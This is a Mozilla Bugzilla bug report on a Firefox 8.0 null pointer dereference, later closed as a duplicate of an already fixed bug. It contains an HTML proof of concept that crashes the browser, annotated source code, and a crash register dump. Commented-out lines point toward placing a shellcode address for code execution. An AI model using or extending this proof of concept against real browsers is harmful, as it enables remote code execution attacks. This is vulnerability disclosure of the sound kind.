Closed
Bug 703560
Opened 13 years ago
Closed 13 years ago
Firefox 8.0 Null Pointer Dereference PoC
Categories
(Firefox :: General, defect, P4)
Tracking
()
RESOLVED
DUPLICATE
of bug 691785
People
(Reporter: tawaha-2007, Unassigned)
Details
Crash Data
Attachments
(1 file)
|
(deleted),
text/plain
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Steps to reproduce:
Open this file html:
<html>
<body>
<object id="dupa">
<script>
RIINDC=document.getElementById("dupa");
RIINDC.QueryInterface(Components.interfaces.nsIRequestObserver);
//RIINDC.mchannel=SHELLCODE_ADDR
RIINDC.onStartRequest(null,RIINDC.QueryInterface(Components.interfaces.nsISupports));
//RIINDC.onStartRequest(RIINDC.mchannel,DWCJWL.QueryInterface(Components.interfaces.nsISupports));
</script>
</body>
</html>
Actual results:
./mozilla-release/content/base/src/nsObjectLoadingContent.cpp
NS_IMETHODIMP nsObjectLoadingContent::OnStartRequest(nsIRequest *aRequest,
nsISupports *aContext)
{
if (aRequest != mChannel) { // our pointer is checked there, mChannel is null. I think maybe some magick in js can help there
return NS_BINDING_ABORTED;
}
AutoNotifier notifier(this, PR_TRUE);
if (!IsSuccessfulRequest(aRequest)) { // go
//----------------------------------------------------------------------------------
PRBool nsObjectLoadingContent::IsSuccessfulRequest(nsIRequest* aRequest)
{
nsresult status;
nsresult rv = aRequest->GetStatus(&status); // Code execution is here.
// ---------------------------------------------------------------------------------
DUMP:
014E7A28 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
014E7A2B 8B07 MOV EAX,DWORD PTR DS:[EDI] ; access violation when reading 0x00000000
014E7A2D 8D4D FC LEA ECX,DWORD PTR SS:[EBP-4]
014E7A30 51 PUSH ECX
014E7A31 57 PUSH EDI
014E7A32 FF50 14 CALL DWORD PTR DS:[EAX+14]
EAX 0012BFC0
ECX 00080000
EDX 00080000
EBX 03A199E8
ESP 0012BF44
EBP 0012BF54
ESI 03A199C0
EDI 00000000
EIP 014E7A2B xul.014E7A2B
Severity: normal → blocker
Crash Signature: AdapterDeviceID: 2a12
AdapterVendorID: 8086
Add-ons: foxyproxy@eric.h.jung:3.3,{bb6bc1bb-f824-4702-90cd-35e2fb24f25d}:1.5.1,mozilla_cc@internetdownloadmanager.com:7.3.9 {972ce4c6-7e08-4474-a285-3208198ce6fd}:8.0
AvailableVirtualMemory: 1951932416
Buil…
Priority: -- → P4
|
||
Comment 1•13 years ago
|
||
Seems likely caused by a null aRequest not being checked properly.
Appears in Beta: http://mxr.mozilla.org/mozilla-beta/source/content/base/src/nsObjectLoadingContent.cpp#504
Fixed in Aurora?: http://mxr.mozilla.org/mozilla-aurora/source/content/base/src/nsObjectLoadingContent.cpp#511
|
|
||
Comment 2•13 years ago
|
||
Assuming the above case:
https://hg.mozilla.org/releases/mozilla-aurora/rev/7fdae8a1acdb
Fixing bug 691785. r=khuey
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•